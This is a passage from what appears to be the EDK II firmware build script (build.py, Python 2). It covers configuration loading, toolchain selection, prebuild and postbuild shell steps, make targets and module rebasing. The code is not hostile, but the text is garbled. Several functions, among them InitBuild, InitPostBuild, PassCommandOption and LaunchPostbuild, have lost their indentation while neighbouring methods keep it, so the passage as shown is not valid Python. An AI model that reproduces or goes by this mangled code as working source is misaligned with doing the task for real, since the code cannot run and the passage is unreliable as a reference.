            if not os.path.isabs(BinCacheSource):
                BinCacheSource = mws.join(self.WorkspaceDir, BinCacheSource)
            GlobalData.gBinCacheSource = BinCacheSource
        else:
            if GlobalData.gBinCacheSource is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-source.")
        if GlobalData.gBinCacheDest:
            # A relative cache-destination path is resolved against the workspace.
            BinCacheDest = os.path.normpath(GlobalData.gBinCacheDest)
            if not os.path.isabs(BinCacheDest):
                BinCacheDest = mws.join(self.WorkspaceDir, BinCacheDest)
            GlobalData.gBinCacheDest = BinCacheDest
        else:
            if GlobalData.gBinCacheDest is not None:
                EdkLogger.error("build", OPTION_VALUE_INVALID, ExtraData="Invalid value of option --binary-destination.")
        if self.ConfDirectory:
            # Get alternate Conf location, if it is absolute, then just use the absolute directory name
            ConfDirectoryPath = os.path.normpath(self.ConfDirectory)
            if not os.path.isabs(ConfDirectoryPath):
                # Since alternate directory name is not absolute, the alternate directory is located within the WORKSPACE
                # This also handles someone specifying the Conf directory in the workspace. Using --conf=Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, ConfDirectoryPath)
        else:
            if "CONF_PATH" in os.environ:
                ConfDirectoryPath = os.path.normcase(os.path.normpath(os.environ["CONF_PATH"]))
            else:
                # Get standard WORKSPACE/Conf use the absolute path to the WORKSPACE/Conf
                ConfDirectoryPath = mws.join(self.WorkspaceDir, 'Conf')
        GlobalData.gConfDirectory = ConfDirectoryPath
        GlobalData.gDatabasePath = os.path.normpath(os.path.join(ConfDirectoryPath, GlobalData.gDatabasePath))
        # --disable-cache keeps the workspace database in memory only.
        if BuildOptions.DisableCache:
            self.Db = WorkspaceDatabase(":memory:")
        else:
            self.Db = WorkspaceDatabase(GlobalData.gDatabasePath, self.Reparse)
        self.BuildDatabase = self.Db.BuildObject
        self.Platform = None
        self.ToolChainFamily = None
        self.LoadFixAddress = 0
        self.UniFlag = BuildOptions.Flag
        self.BuildModules = []
        self.HashSkipModules = []
        # Db_Flag records whether the metafile database was already initialized.
        self.Db_Flag = False
        self.LaunchPrebuildFlag = False
        self.PlatformBuildPath = os.path.join(GlobalData.gConfDirectory,'.cache', '.PlatformBuild')
        if BuildOptions.CommandLength:
            GlobalData.gCommandMaxLength = BuildOptions.CommandLength
        # print dot character during doing some time-consuming work
        self.Progress = Utils.Progressor()
        # print current build environment and configuration
        EdkLogger.quiet("%-16s = %s" % ("WORKSPACE", os.environ["WORKSPACE"]))
        if "PACKAGES_PATH" in os.environ:
            # WORKSPACE env has been converted before. Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("PACKAGES_PATH", os.path.normcase(os.path.normpath(os.environ["PACKAGES_PATH"]))))
        EdkLogger.quiet("%-16s = %s" % ("ECP_SOURCE", os.environ["ECP_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_SOURCE", os.environ["EDK_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EFI_SOURCE", os.environ["EFI_SOURCE"]))
        EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_PATH", os.environ["EDK_TOOLS_PATH"]))
        if "EDK_TOOLS_BIN" in os.environ:
            # Print the same path style with WORKSPACE env.
            EdkLogger.quiet("%-16s = %s" % ("EDK_TOOLS_BIN", os.path.normcase(os.path.normpath(os.environ["EDK_TOOLS_BIN"]))))
        EdkLogger.quiet("%-16s = %s" % ("CONF_PATH", GlobalData.gConfDirectory))
        self.InitPreBuild()
        self.InitPostBuild()
        if self.Prebuild:
            EdkLogger.quiet("%-16s = %s" % ("PREBUILD", self.Prebuild))
        if self.Postbuild:
            EdkLogger.quiet("%-16s = %s" % ("POSTBUILD", self.Postbuild))
        if self.Prebuild:
            self.LaunchPrebuild()
            # Fresh parser objects after the prebuild step -- presumably so that
            # configuration files changed by prebuild are re-read; TODO confirm.
            self.TargetTxt = TargetTxtClassObject()
            self.ToolDef = ToolDefClassObject()
        if not (self.LaunchPrebuildFlag and os.path.exists(self.PlatformBuildPath)):
            self.InitBuild()
        EdkLogger.info("")
        os.chdir(self.WorkspaceDir)
## Load configuration
#
# This method will parse target.txt and get the build configurations.
#
    def LoadConfiguration(self):
        #
        # Check target.txt and tools_def.txt and Init them
        #
        BuildConfigurationFile = os.path.normpath(os.path.join(GlobalData.gConfDirectory, gBuildConfiguration))
        if os.path.isfile(BuildConfigurationFile) == True:
            StatusCode = self.TargetTxt.LoadTargetTxtFile(BuildConfigurationFile)
            # tools_def.txt location comes from target.txt; fall back to the
            # default name when target.txt leaves it empty.
            ToolDefinitionFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_CONF]
            if ToolDefinitionFile == '':
                ToolDefinitionFile = gToolsDefinition
                ToolDefinitionFile = os.path.normpath(mws.join(self.WorkspaceDir, 'Conf', ToolDefinitionFile))
            if os.path.isfile(ToolDefinitionFile) == True:
                StatusCode = self.ToolDef.LoadToolDefFile(ToolDefinitionFile)
            else:
                EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=ToolDefinitionFile)
        else:
            EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=BuildConfigurationFile)
        # if no ARCH given in command line, get it from target.txt
        if not self.ArchList:
            self.ArchList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET_ARCH]
        self.ArchList = tuple(self.ArchList)
        # if no build target given in command line, get it from target.txt
        if not self.BuildTargetList:
            self.BuildTargetList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TARGET]
        # if no tool chain given in command line, get it from target.txt
        if not self.ToolChainList:
            self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
            if self.ToolChainList is None or len(self.ToolChainList) == 0:
                EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
        # check if the tool chains are defined or not
        NewToolChainList = []
        for ToolChain in self.ToolChainList:
            if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
                EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
            else:
                NewToolChainList.append(ToolChain)
        # if no tool chain available, break the build
        if len(NewToolChainList) == 0:
            EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                            ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
        else:
            self.ToolChainList = NewToolChainList
        # Resolve the tool chain family for each tag; default to MSFT when
        # tools_def.txt does not declare one.
        ToolChainFamily = []
        ToolDefinition = self.ToolDef.ToolsDefTxtDatabase
        for Tool in self.ToolChainList:
            if TAB_TOD_DEFINES_FAMILY not in ToolDefinition or Tool not in ToolDefinition[TAB_TOD_DEFINES_FAMILY] \
               or not ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool]:
                EdkLogger.warn("build", "No tool chain family found in configuration for %s. Default to MSFT." % Tool)
                ToolChainFamily.append("MSFT")
            else:
                ToolChainFamily.append(ToolDefinition[TAB_TOD_DEFINES_FAMILY][Tool])
        self.ToolChainFamily = ToolChainFamily
        # Thread number: command line overrides target.txt; 0 or empty means
        # "use the host CPU count", with 1 as the last-resort fallback.
        if self.ThreadNumber is None:
            self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
            if self.ThreadNumber == '':
                self.ThreadNumber = 0
            else:
                self.ThreadNumber = int(self.ThreadNumber, 0)
        if self.ThreadNumber == 0:
            try:
                self.ThreadNumber = multiprocessing.cpu_count()
            except (ImportError, NotImplementedError):
                self.ThreadNumber = 1
        if not self.PlatformFile:
            PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
            if not PlatformFile:
                # Try to find one in current directory
                WorkingDirectory = os.getcwd()
                FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
                FileNum = len(FileList)
                if FileNum >= 2:
                    EdkLogger.error("build", OPTION_MISSING,
                                    ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
                elif FileNum == 1:
                    PlatformFile = FileList[0]
                else:
                    EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
                                    ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
            self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
if not self.Db_Flag:
self.Db.InitDatabase()
    def InitPreBuild(self):
        # Load configuration and validate the platform file before the
        # PREBUILD command line is assembled.
        self.LoadConfiguration()
        ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
        if ErrorCode != 0:
            EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        # Publish the first target/arch/toolchain/family as global defines so
        # later phases (and the prebuild command) can reference them.
        if self.BuildTargetList:
            GlobalData.gGlobalDefines['TARGET'] = self.BuildTargetList[0]
        if self.ArchList:
            GlobalData.gGlobalDefines['ARCH'] = self.ArchList[0]
        if self.ToolChainList:
            GlobalData.gGlobalDefines['TOOLCHAIN'] = self.ToolChainList[0]
            GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = self.ToolChainList[0]
        if self.ToolChainFamily:
            GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[0]
        if 'PREBUILD' in GlobalData.gCommandLineDefines:
            self.Prebuild = GlobalData.gCommandLineDefines.get('PREBUILD')
        else:
            # No PREBUILD on the command line: look it up in the platform DSC,
            # which requires the metafile database to be initialized first.
            self.Db.InitDatabase()
            self.Db_Flag = True
            Platform = self.Db._MapPlatform(str(self.PlatformFile))
            self.Prebuild = str(Platform.Prebuild)
        if self.Prebuild:
            PrebuildList = []
            #
            # Evaluate all arguments and convert arguments that are WORKSPACE
            # relative paths to absolute paths. Filter arguments that look like
            # flags or do not follow the file/dir naming rules to avoid false
            # positives on this conversion.
            #
            for Arg in self.Prebuild.split():
                #
                # Do not modify Arg if it looks like a flag or an absolute file path
                #
                if Arg.startswith('-') or os.path.isabs(Arg):
                    PrebuildList.append(Arg)
                    continue
                #
                # Do not modify Arg if it does not look like a Workspace relative
                # path that starts with a valid package directory name
                #
                if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
                    PrebuildList.append(Arg)
                    continue
                #
                # If Arg looks like a WORKSPACE relative path, then convert to an
                # absolute path and check to see if the file exists.
                #
                Temp = mws.join(self.WorkspaceDir, Arg)
                if os.path.isfile(Temp):
                    Arg = Temp
                PrebuildList.append(Arg)
            self.Prebuild = ' '.join(PrebuildList)
            # Append the effective -b/-a/-t/-p options so the prebuild script
            # sees the same selection as the main build.
            self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
    def LaunchPrebuild(self):
        # Run the PREBUILD command (if any) in a shell, stream its output
        # through the logger, and import the environment it leaves behind.
        if self.Prebuild:
            EdkLogger.info("\n- Prebuild Start -\n")
            self.LaunchPrebuildFlag = True
            #
            # The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
            # and preserve them for the rest of the main build step, because the child process environment will
            # evaporate as soon as it exits, we cannot get it in build step.
            #
            PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory,'.cache','.PrebuildEnv')
            if os.path.isfile(PrebuildEnvFile):
                os.remove(PrebuildEnvFile)
            if os.path.isfile(self.PlatformBuildPath):
                os.remove(self.PlatformBuildPath)
            # 'set' dumps the environment on Windows, 'env' elsewhere.
            if sys.platform == "win32":
                args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
                Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
            else:
                args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
                Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
            # launch two threads to read the STDOUT and STDERR
            EndOfProcedure = Event()
            EndOfProcedure.clear()
            if Process.stdout:
                StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
                StdOutThread.setName("STDOUT-Redirector")
                StdOutThread.setDaemon(False)
                StdOutThread.start()
            if Process.stderr:
                StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
                StdErrThread.setName("STDERR-Redirector")
                StdErrThread.setDaemon(False)
                StdErrThread.start()
            # waiting for program exit
            Process.wait()
            if Process.stdout:
                StdOutThread.join()
            if Process.stderr:
                StdErrThread.join()
            if Process.returncode != 0 :
                EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
            if os.path.exists(PrebuildEnvFile):
                f = open(PrebuildEnvFile)
                envs = f.readlines()
                f.close()
                # Parse 'NAME=value' lines into os.environ.
                # NOTE: itertools.imap/ifilter exist only in Python 2.
                envs = itertools.imap(lambda l: l.split('=',1), envs)
                envs = itertools.ifilter(lambda l: len(l) == 2, envs)
                envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
                os.environ.update(dict(envs))
            EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
        # NOTE(review): FfsCommand uses a mutable default argument; it is only
        # passed through to CreateMakeFile here -- confirm callees never mutate it.
        # Returns True on success, False when AutoGenObject is missing.
        if AutoGenObject is None:
            return False
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            if Target == "genc":
                return True
            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
                self.Progress.Stop("done!")
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)
        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand is None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))
        # platform-level makefile name for the active make type
        makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
        # run
        if Target == 'run':
            RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\SecMain'
            os.chdir(RunDir)
            LaunchCommand(Command, RunDir)
            return True
        # build modules
        if BuildModule:
            BuildCommand = BuildCommand + [Target]
            LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # build library
        if Target == 'libraries':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # build module
        if Target == 'modules':
            # libraries must be built before the modules that link them
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            for Mod in AutoGenObject.ModuleBuildDirectoryList:
                NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
                LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # cleanlib
        if Target == 'cleanlib':
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # clean
        if Target == 'clean':
            for Mod in AutoGenObject.ModuleBuildDirectoryList:
                ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
                if os.path.exists(ModMakefile):
                    NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            for Lib in AutoGenObject.LibraryBuildDirectoryList:
                LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
                if os.path.exists(LibMakefile):
                    NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
                    LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
            return True
        # cleanall
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            # Python 2 'except Type, name' syntax; WindowsError exists only on Windows.
            except WindowsError, X:
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
            return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
    def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
        # Returns True on success, False when AutoGenObject is missing.
        # NOTE(review): targets not handled below fall through returning None.
        if AutoGenObject is None:
            return False
        # skip file generation for cleanxxx targets, run and fds target
        if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
            # for target which must generate AutoGen code and makefile
            if not self.SkipAutoGen or Target == 'genc':
                self.Progress.Start("Generating code")
                AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
                self.Progress.Stop("done!")
            if Target == "genc":
                return True
            if not self.SkipAutoGen or Target == 'genmake':
                self.Progress.Start("Generating makefile")
                AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
                #AutoGenObject.CreateAsBuiltInf()
                self.Progress.Stop("done!")
            if Target == "genmake":
                return True
        else:
            # always recreate top/platform makefile when clean, just in case of inconsistency
            AutoGenObject.CreateCodeFile(False)
            AutoGenObject.CreateMakeFile(False)
        if EdkLogger.GetLevel() == EdkLogger.QUIET:
            EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
        BuildCommand = AutoGenObject.BuildCommand
        if BuildCommand is None or len(BuildCommand) == 0:
            EdkLogger.error("build", OPTION_MISSING,
                            "No build command found for this module. "
                            "Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
                            (AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
                            ExtraData=str(AutoGenObject))
        # build modules
        if BuildModule:
            if Target != 'fds':
                BuildCommand = BuildCommand + [Target]
            AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
            self.CreateAsBuiltInf()
            return True
        # genfds
        if Target == 'fds':
            LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
            return True
        # run
        if Target == 'run':
            RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
            Command = '.\SecMain'
            os.chdir(RunDir)
            LaunchCommand(Command, RunDir)
            return True
        # build library
        if Target == 'libraries':
            pass
        # not build modules
        # cleanall
        if Target == 'cleanall':
            try:
                #os.rmdir(AutoGenObject.BuildDir)
                RemoveDirectory(AutoGenObject.BuildDir, True)
            # Python 2 'except Type, name' syntax; WindowsError exists only on Windows.
            except WindowsError, X:
                EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
            return True
## Rebase module image and Get function address for the input module list.
#
    def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
        # SMM images are placed bottom-up with absolute addresses, so the
        # "address is offset" notation does not apply to them.
        if ModeIsSmm:
            AddrIsOffset = False
        for InfFile in ModuleList:
            # progress indicator: one dot per processed module
            sys.stdout.write (".")
            sys.stdout.flush()
            ModuleInfo = ModuleList[InfFile]
            ModuleName = ModuleInfo.BaseName
            ModuleOutputImage = ModuleInfo.Image.FileName
            ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
            ## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
            if not ModeIsSmm:
                # non-SMM images grow downwards from the current top address
                BaseAddress = BaseAddress - ModuleInfo.Image.Size
                #
                # Update Image to new BaseAddress by GenFw tool
                #
                LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
                LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
            else:
                #
                # Set new address to the section header only for SMM driver.
                #
                LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
                LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
            #
            # Collect funtion address from Map file
            #
            ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
            FunctionList = []
            if os.path.exists(ImageMapTable):
                OrigImageBaseAddress = 0
                ImageMap = open(ImageMapTable, 'r')
                for LinStr in ImageMap:
                    if len (LinStr.strip()) == 0:
                        continue
                    #
                    # Get the preferred address set on link time.
                    #
                    if LinStr.find ('Preferred load address is') != -1:
                        StrList = LinStr.split()
                        OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
                    # map lines with >4 columns and an 'f'/'F' flag describe functions
                    StrList = LinStr.split()
                    if len (StrList) > 4:
                        if StrList[3] == 'f' or StrList[3] == 'F':
                            Name = StrList[1]
                            RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
                            FunctionList.append ((Name, RelativeAddress))
                            if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
                                #
                                # Get the real entry point address for IPF image.
                                #
                                ModuleInfo.Image.EntryPoint = RelativeAddress
                ImageMap.close()
            #
            # Add general information.
            #
            if ModeIsSmm:
                MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
            elif AddrIsOffset:
                MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
            else:
                MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
            #
            # Add guid and general seciton section.
            #
            TextSectionAddress = 0
            DataSectionAddress = 0
            for SectionHeader in ModuleInfo.Image.SectionHeaderList:
                if SectionHeader[0] == '.text':
                    TextSectionAddress = SectionHeader[1]
                elif SectionHeader[0] in ['.data', '.sdata']:
                    DataSectionAddress = SectionHeader[1]
            if AddrIsOffset:
                MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
            else:
                MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
            #
            # Add debug image full path.
            #
            MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
            #
            # Add funtion address
            #
            for Function in FunctionList:
                if AddrIsOffset:
                    MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
                else:
                    MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
            # NOTE(review): ImageMap was already closed above, and is undefined
            # when the first module has no .map file -- confirm this close is intended.
            ImageMap.close()
            #
            # for SMM module in SMRAM, the SMRAM will be allocated from base to top.
            #
            if ModeIsSmm:
                BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
